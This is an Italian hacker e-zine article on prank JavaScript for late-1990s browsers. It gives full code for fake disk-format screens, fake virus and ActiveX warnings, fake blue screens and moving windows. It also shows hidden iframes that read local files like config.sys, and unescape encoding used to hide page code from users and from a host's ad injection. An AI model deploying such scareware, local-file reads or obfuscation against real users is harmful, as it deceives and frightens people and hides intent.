M`$Y?3%A,4TA``$Q83%-(0`!&7TQ83%-(0`!.7U!!1$1``$9?4$%$1$``4$%$
M1$``3E]04U5"
0`!&7U!354)``%!354)``%]?24]%4E)/4@!?7T1/4T524D]2
M`%]I<V%T='D`7U],3TY'5$]!`%]?551/00!?;'-E96L`7U]-2TY!344`7U]4
M35!.04T`3E]00TU00`!?7W)E860`7U]S971U<&EO`%]T96QL`%]U;FQI;FL`
M7U]64%))3E1%4@!?7W-T<&-P>0!?7U]F:7)S=`!?7U]L87-T`%]?7W)O=F5R
M`%]F<F5E`%]F87)F<F5E`%]M86QL;V,`7V9A<FUA;&QO8P!?<F5A;&QO8P!?
M9F%R<F5A;&QO8P!?7V)R:P!?7W-B<FL`7VEO8W1L`%]?4D5!3$-65`!?<V5T
M8FQO8VL`7U]C:&UO9`!?8VQO<V4`7U]C;&]S90!?96]F`%]F8VQO<V4`7V9F
M;'5S:`!?9FQU<VAA;&P`7U]/4$5.1E``7U]'151&4`!?9F]P96X`7V9P<FEN
M=&8`7V9S965K`%]F=&5L;`!?7V9G971C`%]?3F9G971C`%]F9V5T8P!?9F=E
M=&-H87(`7VUE;6-P>0!?;W!E;@!?7V]P96X`7U]F<'5T8P!?9G!U=&,`7V9P
M=71C:&%R`%]?1E!55$X`7U]?<F5A9`!?<V5T=F)U9@!?<W1R8V%T`%]S=')L
M96X`7U]?=W)I=&4`7U]W<FET90!?7WAF8VQO<V4`7U]X9F9L=7-H`%]M86EN
M`$1!5$%314=``%]?26YT,%9E8W1O<@!?7TEN=#1696-T;W(`7U]);G0U5F5C
M=&]R`%]?26YT-E9E8W1O<@!?7T,P87)G8P!?7T,P87)G=@!?7T,P96YV:7)O
M;@!?7V5N=DQN9P!?7V5N=G-E9P!?7V5N=E-I>F4`7U]P<W``7U]O<W9E<G-I
M;VX`7U]O<VUA:F]R`%]?=F5R<VEO;@!?7V]S;6EN;W(`7V5R<FYO`%]?4W1A
M<G14:6UE`%]?:&5A<&)A<V4`7U]B<FML=FP`7U]H96%P=&]P`%]?871E>&ET
M8VYT`%]?871E>&ET=&)L`%]?97AI=&)U9@!?7V5X:71F;W!E;@!?7V5X:71O
M<&5N`%]?<W1R96%M<P!?7VYF:6QE`%]?;W!E;F9D`%]?9FUO9&4`7U]N;W15
M;6%S:P!?7V1O<V5R<FYO`%]?9&]S17)R;W)4;U-6`%]?<W1K;&5N`%]?87)G
M8P!?7V%R9W8`7U]296%L0W9T5F5C=&]R`%]?4V-A;E1O9%9E8W1O<@!?7W-E
M=&%R9W9?7P!?7V-V=&9A:P!?7T%(4TA)1E0`7U]!2$E.0U(`5D)#+D,`5D)#
M`&8`:0!K`&QE9V=I`&%P<FD`=P!P`&X`9FEL90!&24Q%`&9P;W-?=`!S:7IE
M7W0`;&5V96P`9FQA9W,`9F0`:&]L9`!B<VEZ90!B=69F97(`8W5R<`!I<W1E
);7``=&]K96X`
`
end
sum -r/size 41569/16164
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ JAVASCRIPT ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Cose piu' o meno interessanti riguardo al javascript.

Io sono un vero appassionato di javascript, non di java che e' un linguaggio
completo, ma proprio del javascript.. quel codice subdolo che ciascuno puo'
inserire in una pagina web senza dover sostenere nessun esame o sottostare
ad alcuna regola.
Questo perche' il javascript e' fondamentalmente sicuro.
A parte il crashing del browser INFATTI non e' possibile in alcun modo
violare anche minimamente la sicurezza di un sistema.. questo PERO' OVVIAMENTE
a meno di 'volontarie' dichiarazioni di assenso espresse con leggerezza da
un utente sprovveduto.
E' possibile infatti far partire da javascript qualunque tipo di programma
presente sull'hd .. ma viene sempre chiesto all'utente di 'acconsentire'
all'operazione e viene subito informato che la medesima presenta dei risvolti
decisamente poco felici.
E' possibile inviare ad un indirizzo email alcuni vostri dati: l'IP, il nome
del vostro server, la data, l'ora, il tipo di browser che state usando.. ecc..
Anche qui viene richiesta prima una conferma pero'.
Insomma, queste ed altre cose di varia' umanita' informatica.
Queste sono cmq nozioni di base a conoscenza della maggior parte delle persone
che navigano in rete con un minino di Know how.
Per tutti gli altri ;-) .. esistono vari trucchi per far credere che determinati
programmi sono stati avviati in maniera 'maliziosa' e invisibile e che allo stato
attuale:

1. Il vostro hd viene formattato.
2. Un virus e' stato installato nel vostro command.com
3. Il vostro computer e' andato in crash irreversibile
ecc...

Sono ovviamente tutti trucchi come ho gia' detto ma di recente con l'entrata
in scena del DHTML (Dynamic HTML) e' possibile dare una maggiore corposita'
a questi giochi tanto da lasciare abbastanza sconcertati anche i navigatori
piu' vispi.

Fino ad ora si vedeva avanzare la percentuale che avvisava della formattazione
sulla barra di stato del browser:

function format(percento){
if(percento < 100)
{
percento++;
window.status="Formating drive C:\\: "+percento+"% complete"
fid=window.setTimeout("format("+percento+")",300);
}
else window.status="Drive C:\ Formatted.";
}

O anche la percentuale che avvertiva del virus che veniva downlodato ed installato:

function virus(percento){
if(percento < 100)
{
percento++;
window.status="Downloading virus: "+percento+"% complete"
fid=window.setTimeout("virus("+percento+")",300);
}
else window.status="You are infected.";
}


O al massimo la finestrella che avvertiva su determinati eventi accaduti a vostra insaputa.

alert(' qualcosa ') .. o confirm(' qualcosa ')

as esempio:

<script>
window.alert("Warning! Your browser has detected a virus in this page. ")
window.alert("Click OK to continue. The virus MAY not affect you. Or else
reset your computer right now. "
)
</script>

.. fanno un po ridere queste cose vero? :))

Beh .. queste vi faranno ridere di meno! :)


Questi che vi presento sono aluni sorgenti che ho fatto molto rapidamente..
in effetti non sono un gran che di elegante ma cmq funzionano e non sono nati
assolutamente per avere delle pretestuosita' professionali o altro. Sono solo
dei puri e semplici giochini.

E' da premettere che potete eseguirli tutti senza alcun problema, non procurano
alcun danno ne violano in alcun modo la sicurezza del vostro sistema.

Per chi volesse vederli all'opera direttamente dalla rete senza doverseli copiare
in un file html potra' farlo andando qui:

www.spippolatori.com/crepacuore.htm

Crepacuore e' il titolo (spero azzeccato) di questa gradevole presentazione. :))

Tutti gli script si basano su POCHE utilissime funzioni javascript presenti nei
browser piu' recenti. IE4 NS4. (che poi sono quelli piu' usati in assoluto)
Le ho divise in 5 gruppi elementari

1. Funzioni per muovere e ridimensionare la finestra principale del browser:

self.moveTo(x,y)
[ sposta la finestra in riferimento assoluto relativamente al desktop
prendendo come punto origine (0,0) il pixel in alto a sinistra. ]

self.moveBy(x,y)
[ sposta la finestra relativamente alla posizione attuale di x pixel in
orizzontale e y pixel in verticale ]

self.resizeTo(x,y)
[ ridimensiona la finestra alle dimensioni assolute x,y pixel ]

self.resizeBy(x,y)
[ restringe o allarga la finestra di x pixel in orizzontale e y pixel in
verticale]


2. Funzioni per conoscere le dimensioni del proprio schermo

screen.width [ dimensione in orizzontale ]


screen.height [ dimensione in verticale ]

Se avete una risoluzione video di 800 x 600 con

<script>
largo = screen.width
lungo = screen.height
</script>

memorizzate in largo (800) e nella variabile lungo (600)

.. e' possibile usare questi parametri per posizionare ad esempio un qualcosa
al centro del propri desktop

Mettiamo di voler ridimensionare il proprio browser a 100x100 pixel e
di voler posizionare l'angolo in alto a sinistra al centro del desktop.

si fa cosi':

<script>
Cx = screen.width / 2
Cy = screen.height / 2
self.resizeTo(100,100)
self.moveTo(Cx,Cy)
</script>

semplice no!?


3. Funzioni specifiche text/css per il posizionamento del testo sullo schermo.

Qui e' necessario crearsi uno style text.
Lo style e' un testo dichiarato che viene posizionato mediante alcuni puntatori.
Per avere un esempio di come funziona potete scaricarvi la pagina iniziale
del sito

www.spippolatori.com

e guardare come e' stata fatta.


4. Funzioni proprie del DHTML per l'orientamento del testo.

Guardare l'esempio G.htm


5. Funzioni matematiche contenute nella libreria Math.xxx

Gli script sono i seguenti .. non li commento perche' sono semplicissimi.
Anche in considerazione del fatto che chi non conosce il javascript avra'
cmq serie difficolta' nel capirli.. e per coloro che ne conoscono anche poco
non c'e' nessun problema.. ogni procedura e' dichiarata in modo preciso e
'minimo' tanto da dare immediatezza di compresione ai vari meccanismi di
elaborazione.



FORMATTATORE IMMEDIATO DI HD. :)
-------------------------------------------------------------------------------------------
<script>
var t=screen.width+100
var q=screen.height+200
self.moveTo(0,0)
self.resizeTo(0,0)
function m(){
self.moveTo(-30,-150)
self.resizeTo(t,q)
document.all.h.style.pixelTop=60
document.all.h.style.pixelLeft=20
document.all.h.style.fontSize="16pt"
}
function n(){
a++
if(a<=100){
h.innerHTML = "<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x
<BR>   (C)Copyright Microsoft Corp 1981-1998.<BR><BR>
<BR>C:\>format C: /AUTOTEST<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C:
<BR>ANDRANNO PERSI<BR><BR>Continuare con la formattazione (S/N)? S<BR><BR>
Controllo del formato del disco.<BR>Verifica del formato in corso.<BR><BR>
   "
+a+"% PERCENTO COMPLETATO.</FONT>";
}

else
h.innerHTML = "<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x<BR>
   (C)Copyright Microsoft Corp 1981-1998.<BR><BR><BR>C:\>
format C: /AUTOTEST<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C:<BR>
ANDRANNO PERSI<BR><BR>Continuare con la formattazione (S/N)? S<BR><BR>
Controllo del formato del disco.<BR>Verifica del formato in corso.<BR>
<BR>   FORMATTAZIONE COMPLETATA.<BR><BR>Etichetta di volume
(11 caratteri, INVIO per non darne)?<BR><BR>Numero di serie del volume:
391B-07F7<BR><BR>C:\></FONT><FONT font-size='10pt' face='Arial'
color=#AA0000>Javascript Formatter By Master - Hacker .. Have a nice day!
;-)</FONT>"
;


setTimeout("n()",100)
}
</script>

<STYLE TYPE="text/css">
#m1{
position: absolute;font-name:Arial Bold;color:white};
#h{font-color: white;font-name: Trouble MS;}
</STYLE>

<BODY BGCOLOR=#000000 onLoad="a=0;m();n()">
<DIV ID="m1"> </DIV>
<FONT><DIV ID="h" STYLE="position:relative; left: 100px; top: 200px; width:
1000px; height: 300px; color: WHITE;"
></DIV></FONT>
</BODY>
-------------------------------------------------------------------------------------------

FORMATTATORE DI HD CON AVVISO DI ACTIVEX E CLESSIDRA SUL MOUSE.

-------------------------------------------------------------------------------------------
<script>
var t=screen.width+100
var q=screen.height+200
self.moveTo(0,0)
self.resizeTo(0,0)
function m(){
self.moveTo(-30,-150)
self.resizeTo(t,q)
document.all.h.style.pixelTop=60
document.all.h.style.pixelLeft=40
document.all.h.style.fontSize="16pt"
}
function w(){
a=window.confirm("Internet Explorer ha rilevato l\'esecuzione senza conferma
di un ActiveX\nQuesto tipo di file non comprensivo di firma puo\' contenere
virus e programmi che potrebbero danneggiare il sistema.\nSi consiglia di
riavviare il computer e controllare il disco rigido con un antivirus.\n\nActiveX
Name : [sconosciuto]\nOriginating IP [ 194.183.212.37 ] (Impossible to resolve)
\n\nRegX : AX:000 BX:001 CX:027\nRegX : DX:021 SX:027 NX:000\n\n\n
TERMINA IL PROCESSO ? "
)
}
function n(){
a++
if(a>=7&&a<=100){
// Questi servono per visualizzare la clessidra sul mouse. ;-)
t=Math.floor(4*(a/4-Math.floor(a/4)))
if(t==0)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/config.sys" >'
else if(t==1)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/leggimi.txt" >'
else if(t==2)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/rete.txt" >'
else if(t==3)k.innerHTML = '<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/windows/IE4 Setup Log.Txt" >'
// -----------------------------------------------------------
}
var a1="<FONT face='Fixedsys' color=#999999>Microsoft(R) Windows 9x<BR>   
(C)Copyright Microsoft Corp 1981-1998."

var a2="<BR><BR><BR>C:\>format C: /AUTOTEST"
var a3="<BR><BR>ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C:<BR>ANDRANNO PERSI<BR>"
var a4="<BR>Continuare con la formattazione (S/N)? S"
var a5="<BR><BR>Controllo del formato del disco."
var a6="<BR>Verifica del formato in corso."
var a7="<BR><BR>  "+a+"% PERCENTO COMPLETATO."
var a8="<BR><BR>   FORMATTAZIONE COMPLETATA.<BR><BR>Etichetta di
volume (11 caratteri, INVIO per non darne)?<BR><BR>Numero diserie del volume:
391B-07F7<BR><BR>C:\></FONT><FONT font-size='10pt' face='Arial' color=#AA0000>
Javascript Formatter By Master - Hacker .. Have a nice day! ;-)</FONT>
<FONT font-size='10pt' face='MS Trouble' color=#AAAA00> ALT+F4 per uscire.</FONT>"

var f="</FONT>"
if(a==1)h.innerHTML =a1+f
else if(a==2)h.innerHTML=a1+a2+f
else if(a==3)h.innerHTML=a1+a2+a3+f
else if(a==4)h.innerHTML=a1+a2+a3+a4+f
else if(a==5)h.innerHTML=a1+a2+a3+a4+a5+f
else if(a==6)h.innerHTML=a1+a2+a3+a4+a5+a6+f
else if(a>=7&&a<=100)h.innerHTML =a1+a2+a3+a4+a5+a6+a7+f
else h.innerHTML=a1+a2+a3+a4+a5+a6+a8+f
setTimeout("n()",100)
}
</script>

<STYLE TYPE="text/css">
#h{font-color: white}
#k{font-color: white}
</STYLE>

<BODY BGCOLOR=#000000 onLoad="a=0;w();m();n()">
<FONT><DIV ID="h" STYLE="position:absolute; left: 200px; top: 200px; width: 1000px;
height: 300px; color: WHITE; z-index: 1;"
></DIV></FONT>
<FONT><DIV ID="k" STYLE="position:absolute; left: 0; top: 0; width: 1px; height:
1px; color: WHITE; z-index: 2;"
></DIV></FONT>
</BODY>

-------------------------------------------------------------------------------------------

ERRORE NEL VXD ... IL TIPICO SCHERMO BLU DANNAZIONE DEGLI UTENTI WINDOWS.

-------------------------------------------------------------------------------------------
<script>
var t=screen.width+100
var q=screen.height+200
function m(){
self.moveTo(-30,-150)
self.resizeTo(t,q)
document.all.m1.style.pixelTop=(q-200)/2
document.all.m1.style.pixelLeft=(t-100)/2-240
document.all.m1.style.fontSize="14pt"
document.all.m1.style.color="white"
}
</script>
<STYLE TYPE="text/css">
#m1{
position: absolute;
font-name:Arial Bold;
color:#000099};
</STYLE>
<BODY BGCOLOR=#000099 onLoad="m()">
<DIV ID="m1">ERRORE nel modulo VXD 4802:2320 RegX : 281 - 000 - 010 - 027</DIV>
</BODY>
-------------------------------------------------------------------------------------------

ERRORE NEL VXD .. con aggiunta di finestra volante. hi hi hi

-------------------------------------------------------------------------------------------
<script>
var t=screen.width+100
var q=screen.height+200
function m(){
self.moveTo(-30,-150)
self.resizeTo(t,q)
document.all.m1.style.pixelTop=(q-200)/2
document.all.m1.style.pixelLeft=(t-100)/2-240
document.all.m1.style.fontSize="14pt"
document.all.m2.style.pixelTop=(q-200)/2+32
document.all.m2.style.pixelLeft=(t-100)/2-200
document.all.m2.style.fontSize="12pt"

}
function n()
{
x=window.open("","pippo")
vola()
}
function vola() {
x.moveTo(screen.availWidth/2+400*Math.sin(a)-100,screen.availHeight/2+250*Math.cos(a))
x.resizeTo(Math.abs(300*Math.cos(a))+100,100)
a=a+6.28/130
setTimeout("vola()",10)
}
</script>
<STYLE TYPE="text/css">
#m1{
position: absolute;
font-name:Arial Bold;
color:white};
#m2{
position: absolute;
font-name:Arial Bold;
color:yellow};
</STYLE>
<BODY BGCOLOR=#000099 onLoad="a=0;b=0;m();n()">
<DIV ID="m1">ERRORE nel modulo VXD 4802:2320 RegX : 281 - 000 - 010 - 027</DIV>
<DIV ID="m2">[ con aggiunta di finestra volante ;-) ]</DIV>
</BODY>
-------------------------------------------------------------------------------------------

UNA FINESTRA SI AGGIRA MISTERIOSA PER LO SCHERMO.. DOVE MAI ANDRA'!?!? :)

-------------------------------------------------------------------------------------------
<HTML>
<BODY>
<SCRIPT LANGUAGE=JAVASCRIPT>

function moveIt() {
self.moveTo((screen.availWidth-800)/2+500*Math.cos(b+0.1),
(screen.availHeight-600)/2+500*Math.cos(a+0.2))
self.resizeTo(400+200*Math.sin(a+0.1),400+200*Math.cos(b+0.1))
a=a+0.1
b=b+0.15
setTimeout("moveIt()",1)
}

</SCRIPT>
<BODY BGCOLOR=#0000AA onload="a=0;b=0;moveIt()">
</BODY>
</HTML>
-------------------------------------------------------------------------------------------

QUESTO CODICE APRE UNA NORMALE SESSIONE DEL BROWSER E DOPO 10 SECONDI FA SCIVOLARE
VIA IL BROWSER STESSO SOTTO IL VOSTRO DESKTOP.
POTENZA DELLA UTILISSIMA FUNZIONE moveBy(x,y)! ;-)

-------------------------------------------------------------------------------------------
<HTML>
<title>Movarello</title>
<SCRIPT LANGUAGE=JAVASCRIPT>

function seconda()
{
self.moveBy(0,a)
a=a+0.1
pippo.value=a
setTimeout("seconda()",1)
}

</SCRIPT>
<BODY BGCOLOR=#0000AA onload="a=0;setTimeout('seconda()',10000)">
<TEXTAREA name="pippo" ROWS=1 COLS=25 WRAP="virtual">
aspetta 10 secondi!
</TEXTAREA>
</BODY>
</HTML>
-------------------------------------------------------------------------------------------

QUI ANDIAMO SUL COMPLICATO.. QUESTO JAVASCRIPT + DHTML MOSTRA DEGLI ELEMENTI
GRAFICI CHE SI SORMONTANO SULLE BARRE DI SCORRIMENTO DEL BROWSER. SE LO FATE
GIRARE SU OUTLOOK IMPORTANDOLO COME FILE HTML .. FARA' LA STESSA COSA.
E' UN DIFETTO DELLE TABLE TEXT CSS CREATE IN HTML QUANDO QUESTE SUPERANO LA
DIMENSIONE VISIBILE (INNER) DEL VOSTRO BROWSER.
NON E' FACILISSIMO DA CAPIRSI MA CMQ INTERESSANTE.

-------------------------------------------------------------------------------------------
<SCRIPT>
function init(){
uno.Scale(0.4, 1.50, 1.50)
due.Scale(0.40, 1.40, 1.40)
tre.Scale(0.50, 1.50, 1.50)
uno.rotate(90, 0, 0)
due.Rotate(90, 0, 0)
tre.Rotate(90, 0, 0)
RotateAll()
k++
}
function RotateAll(){
uno.Rotate(k,0,0)
due.Rotate(-k,0,0)
tre.Rotate(k,0,0)
setTimeout("RotateAll()", 30)
}
</SCRIPT>

<BODY bgColor=black onLoad="k=1;init()">

<OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=tre
style="HEIGHT: 500px;
LEFT: 0%;
POSITION: relative;
TOP: 0%; WIDTH: 500px;
ZINDEX: 0"
>
<PARAM NAME="SourceURL" VALUE="">
<PARAM NAME="CoordinateSystem" VALUE="0">
<PARAM NAME="MouseEventsEnabled" VALUE="0">
<PARAM NAME="HighQuality" VALUE="0">
<PARAM NAME="PreserveAspectRatio" VALUE="-1">
<PARAM NAME="Line0001" VALUE="SetLineStyle(1,0)">
<PARAM NAME="Line0002" VALUE="SetLineColor(255,255,0)">
<PARAM NAME="Line0003" VALUE="SetFillStyle(0)">
<PARAM NAME="Line0004" VALUE="SetFont('Arial',70,70,0,0,0)">
<PARAM NAME="Line0005" VALUE="Text('SPPIPPOLATORI',-90,87)">
</OBJECT>

<OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=due
style="HEIGHT: 500px;
LEFT: 0%;
POSITION: absolute;
TOP: 0%;
WIDTH: 500px;
ZINDEX: 1"
>
<PARAM NAME="SourceURL" VALUE="">
<PARAM NAME="CoordinateSystem" VALUE="0">
<PARAM NAME="MouseEventsEnabled" VALUE="0">
<PARAM NAME="HighQuality" VALUE="0">
<PARAM NAME="PreserveAspectRatio" VALUE="-1">
<PARAM NAME="Line0001" VALUE="SetLineStyle(1,0)">
<PARAM NAME="Line0002" VALUE="SetLineColor(255,0,0)">
<PARAM NAME="Line0003" VALUE="SetFillStyle(0)">
<PARAM NAME="Line0004" VALUE="SetFont('Arial',180,200,0,0,0)">
<PARAM NAME="Line0005" VALUE="Text('MASTER',-90,87)">
</OBJECT>

<OBJECT classid=CLSID:369303C2-D7AC-11D0-89D5-00A0C90833E6 id=uno
style="HEIGHT: 500px;
LEFT: 0%;
POSITION: absolute;
TOP: 0%;
WIDTH: 500px;
ZINDEX: 2"
>
<PARAM NAME="SourceURL" VALUE="">
<PARAM NAME="CoordinateSystem" VALUE="0">
<PARAM NAME="MouseEventsEnabled" VALUE="0">
<PARAM NAME="HighQuality" VALUE="0">
<PARAM NAME="PreserveAspectRatio" VALUE="-1">
<PARAM NAME="Line0001" VALUE="SetLineStyle(1,0)">
<PARAM NAME="Line0002" VALUE="SetLineColor(255,127,0)">
<PARAM NAME="Line0003" VALUE="SetFillStyle(0)">
<PARAM NAME="Line0004" VALUE="SetFont('Arial',180,200,0,0,0)">
<PARAM NAME="Line0005" VALUE="Text('HACKER',-90,87)">
</OBJECT>

</BODY>

-------------------------------------------------------------------------------------------


VISUALIZZA IL VOSTRO CONFIG SYS SU UNA FINESTRELLA! ;-)
-------------------------------------------------------------------------------------------
<script>
function vedi()
{alert("TI SEMBRA CHE IL TUO FILE CONFIG.SYS SIA QUESTO?\n\nPOSSIBILE? ;-)
\n\n\n\n\n"
+document.p.document.body.innerHTML)}
</script>
<BODY onLoad="setTimeout ('vedi()', 400)">
<IFRAME STYLE="width=1px; height=1px;" NAME="p" SRC="file://c:/config.sys" >
<script>
-------------------------------------------------------------------------------------------

FINE.

Aggiungo anche un paio di cose utili a conforto della completa inutilita'
dei programmi sopra.
:-)


ESEGUIRE DEL CODICE HTML IN ASCII PURO
-------------------------------------------------------------------------------------------
E' molto semplice ma allo stesso tempo efficace.
Il tutto si basa sulla proprieta' della funzione javascript unescape che
converte in maniera praticamente immediata del codice ASCII puro nel suo
equivalente letterale.

Percui e' possibile convertire intere pagine HTML in ascii tramite un programma
in C il cui sorgente vi posto di seguito (comprensivo del programma gia compilato
codificato uuencode alla fine di questo testo) ed eseguirle con questa semplice
funzione javascript:

<SCRIPT>
a=" TUTTO IL CODICE ASCII PURO DELLA PAGINA HTML DA ESEGUIRE"
function b(){c=unescape(a);document.write(c);}b()
</SCRIPT>

il programm in C TROVASCI ( TROVASCI.exe compilato) e' questo
-------------------------------
#include <stdio.h>
#include <string.h>
void main(n,file)
int n;
char *file[];
{
char *p;
int a;
FILE *apri, *leggi;
leggi=fopen(file[1],"rb");
p=file[1]; p[strlen(p)-1]='_';
apri=fopen(p,"wb");
while(!feof(leggi)){
a=fgetc(leggi);
if(a>15)
fprintf(apri,"%%%x",a);
else
fprintf(apri,"%%0%x",a);
}
fclose(apri);
fclose(leggi);
}
-------------------------------


Passandogli una pagina HTML scrivera una immagine in ascii puro.

Es.

TROVASCI pippo.htm

creera' una immagine pippo.ht_ di pippo.htm contenente l'ascii puro.



ma andiamo per ordine eseguendo un esempio pratico.

Mettiamo di voler eseguire la pagina HTML

<script>
alert(' SEI STATO INFETTATO DA UN VIRUS ')
</script>

Senza che l'utente (medio) posa capire dal sorgente html di cosa si tratta.

Dovremo avere a disposizione.

1. la pagina HTML (il file) contente le righe di script sopra.
Chiamiamolo S.HTM

2. Il programma Trovasci.

3. un po' di pazienza. ;-)


Passiamo il file S.htm contenente:

--------------------------------------------
<script>
alert(' SEI STATO INFETTATO DA UN VIRUS ')
</script>
--------------------------------------------


al trovasci.

TROVASCI S.HTM

ci troveremo un file S_HT_ contenente :

--------------------------------------------
%3c%73%63%72%69%70%74%3e%0d%0a%61%6c%65%72%74%28%27%20%53
%45%49%20%53%54%41%54%4f%20%49%4e%46%45%54%54%41%54%4f%20
%44%41%20%55%4e%20%56%49%52%55%53%20%27%29%0d%0a%3c%2f%73
%63%72%69%70%74%3e
--------------------------------------------

E' l'equivalente in ascii puro del file S.HTM

ci creeremo quindi un altro file PARTI.HTM

contentente il seguente codice:

--------------------------------------------
<SCRIPT>
a="%3c%73%63%72%69%70%74%3e%0d%0a%61%6c%65%72%74%28%27%20%53%45%49%20%53%54%41%54%4f%20%49%4e%46%45%54%54%41%54%4f%20%44%41%20%55%4e%20%56%49%52%55%53%20%27%29%0d%0a%3c%2f%73%63%72%69%70%74%3e"
function b(){c=unescape(a);document.write(c);}b()
</SCRIPT>
--------------------------------------------


.. eseguendolo verra' eseguito (in maniera pseudo cifrata) il contenuto
originario di s.htm

-------------------------------------------------------------------------------------------



APPLICAZIONE PRATICA DEL JAVASCRIPT IN CODIFICATO ASCII
ELIMINAZIONE EVOLUTA DEI POPUP-WINDOW-BANNER NEI SITI WEB SPACE-FREE
-------------------------------------------------------------------------------------------

Lo avevo gia postato nella nostra ml.

Quando si cerca casa sul web e la si trova in un hosting free tipo Geocities, freeweb,
Freecity, Serer101, ecc.. ci si trova sempre a dover affrontare la realta' dei popup
banner (quelle finestrelle che si aprono indipendentemente dalla vostra volonta'
contenenti spesso pubblcita' insulse e penalizzanti in termini di velocita' per il vostro
sito)

Sono dei semplici javascript che vengono 'appesi' da programmi residenti sul server (perl, cgi.script,
script C, ecc..) in fondo alle vostre pagine HTML.

Generalamente e' semplicissimo eliminarli.. basta appendere in fondo alle proprie pagine
una serie di due o tre </NOSCRIPT> al fine di elimarli.
Ultimamente invece alcuni server (anche server101!) controllano sulla pagina la presenza
o meno degli apici di chiusura <HTML> </HTML> e dei </NOSCRIPT> a seguito di questi.. quindi
li eliminano.

L'esecuzione allora di codice in ascii puro diventa 'miracolosa' .. il noscript viene eseguito
e il server non riesce a cancellarlo..anche perche' non se ne accorge.

METODO:

Scrivete le vostre pagine SENZA apici <HTML> </HTML> (tanto non servono a niente!)

in fondo alla pagina attaccate i vostri </NOSCRIPT> codificati!

cosi':


....
....
....

<script>
var a="%3C%4E%4F%53%43%52%49%50%54%3E%3C%4E%4F%53%43%52%49%50%54%3E%0D%0A%3C%4E%4F%53%43%52%49%50%54%3E%0D%0A"
function b(){c=unescape(a);document.write(c);}b()
</script>

e' i popup saranno eliminati ancor prima di partite! ;-)


-------------------------------------------------------------------------------------------


Questa volta e' veramente la fine. ;-))

Master - Hacker

----------------------------- SUPPORTI

begin 644

  
TROVASCI.EXE
M35K``1D`EP!`````___4`H``````````/@````$`^U!J<@``````````````
M```````````````````````!````6P```*`````Z`0``RP""`KX`@@*E`(("
MA`""`FX`@@)2`(("
+0""`A8`@@)<`@``D`(``+<"``"5`P``@`,``&H#``!4
M`P``#P,```4#``#R`@``Y`(``-@"```>`9("&@&2`A8!D@);!```+00``',$
M``"+!```J`0``"P%``!3!0``704``/`%``")!0``;`8``'8&``"E!@``LP8`
M`,8&``#E!@``\P8``/\&```4!P``)`<``#X'``!.!P``8P<``','``"-!P``
MHP<``,('``#_!P``K0P``,P2``"
S$@``FA(``'T2``!6$@``1A(``$$2```*
M$@``\1$``.P1``#0$0``Q1$``*(1``"&$0``?!$``%X1``!'$0``/A$``/P2
M``!=%```@!0``,44``"
L%```I!0``-\4``#O%```#14``!(5```K%0``E!4`
M`$86```Q%P``)1<``!X7``!M&0``-!D``!L9```4&0``/A@``!@8```/&```
M]Q<``&P7``"F&0``W!H``%,:``#-&0``/!L``'\;``#^&P``'AP```\=``!&
M&P``%!T``"
H=``!/'0``<1T``(\=``"@'0``RQT``.D=```$'P``'A\``%L?
M``"
2(@``WB$``%TA```_(0``.B$``*D@``";'P``=Q\``&\C``!T(P``FB,`
M`,\C```^)```'24``!0E``!;)```A"
4``,<E``!L)@``128``"(F``#Z)0``
M\B4``%HG``!D)P``CR<``-LG``"
V)P``K2<``/\G``#U)P``````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````+J2`BZ)%E,"M##-
M(8LN`@"
+'BP`CMJC?0",!GL`B1YW`(DNCP#H0`'$/G4`B\>+V+G_?_SRKN-#
M0R8X!77V@,V`]]F)#G4`N0(`T^.#PQ"
#X_")'GD`C-(KZK^2`H[')HL^4`.!
M_P`"
<PB_``(FB3Y0`[$$T^]'.^]S`^F^`8O?`]J)'H<`B1Z+`*%[`"O8CL"T
M2E?-(5_3Y_J.THOG^[B2`H[`)HD^4`.#/K`"%'9'@#Y]``-R0'<'@#Y^`!YR
M-[@!6+L"
`,TA<BJT9XL>L`+-(7(@M$B[`0#-(7(70*./`$B.P+1)S2%R"K@!
M6+L``,TA<P/I10&T`,T:B1:!`(D.@P`*P'0,N$``CL"
[<``FQ@<!,^TNC@93
M`KX.!+\:!.BZ`/\V<P#_-G$`_S9O`/\V;0#_-FL`F@T`@@)0D`[H#0(NC@93
M`E97OAH$OQH$Z(L`7U[+RXOLM$R*1@3-(;D.`+HO`.G:`!ZX`#7-(8D>6P",
M!ET`N`0US2&)'E\`C`9A`+@%-<TAB1YC`(P&90"
X!C7-(8D>9P",!FD`N``E
MC,J.VKI?`<TA'\,>+HX>4P(>N``EQ19;`,TA'QZX!"
7%%E\`S2$?'K@%)<46
